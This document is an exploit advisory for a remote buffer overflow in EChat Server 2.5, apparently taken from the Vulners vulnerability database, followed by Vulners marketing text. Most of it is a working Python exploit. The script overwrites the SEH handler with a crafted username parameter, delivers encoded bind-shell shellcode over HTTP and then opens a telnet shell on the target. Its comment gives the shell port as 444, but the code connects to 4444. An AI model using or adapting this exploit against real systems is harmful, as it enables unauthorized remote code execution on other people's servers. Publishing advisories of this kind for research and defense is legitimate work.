`Information
--------------------
Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>
Description
------------------
EChat Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploiting this issue will allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.
Exploit example as follow
-----------------------------
#!/usr/bin/python
# Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: [email protected]
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
import string, sys
import socket, httplib
import telnetlib
def howtousage():
print "Sorry, required arguments: Host Port"
sys.exit(-1)
def run():
try:
# Basic structure: JUNK + NSEH + SEH + SHELLCODE
Junk = '\x41' * 216 # 216 bytes of A
nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret
# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
ShellCode = (
"\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
"\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
"\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
"\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
"\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
"\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
"\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
"\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
"\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
"\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
"\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
"\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
"\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
"\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
"\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
"\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
"\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
"\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
"\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
"\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
"\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
"\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
"\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
"\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
"\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
"\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
"\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
"\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
"\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
"\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
"\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
"\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
"\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
"\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
"\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")
ShellCodePort = 4444
CraftedBuffer = Junk + nSEH + SEH + ShellCode
vulnerableURL = '/chat.ghp?username=' + CraftedBuffer +
'&password=null&room=1&null=2'
Connection = httplib.HTTPConnection(Host, Port)
Connection.request('GET', vulnerableURL)
Connection.close()
print "Connecting to " + Host
TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
TelnetConnection.interact()
except:
print "Exploit connection closed"
if __name__ == '__main__':
print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
print "Author: Juan Sacco (Runlvl)"
try:
Host = sys.argv[1]
Port = sys.argv[2]
except IndexError:
howtousage()
run()
Author
-------------------
Juan Sacco (Runlvl) - http://www.insecurityresearch.com
--
_________________________________________________
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation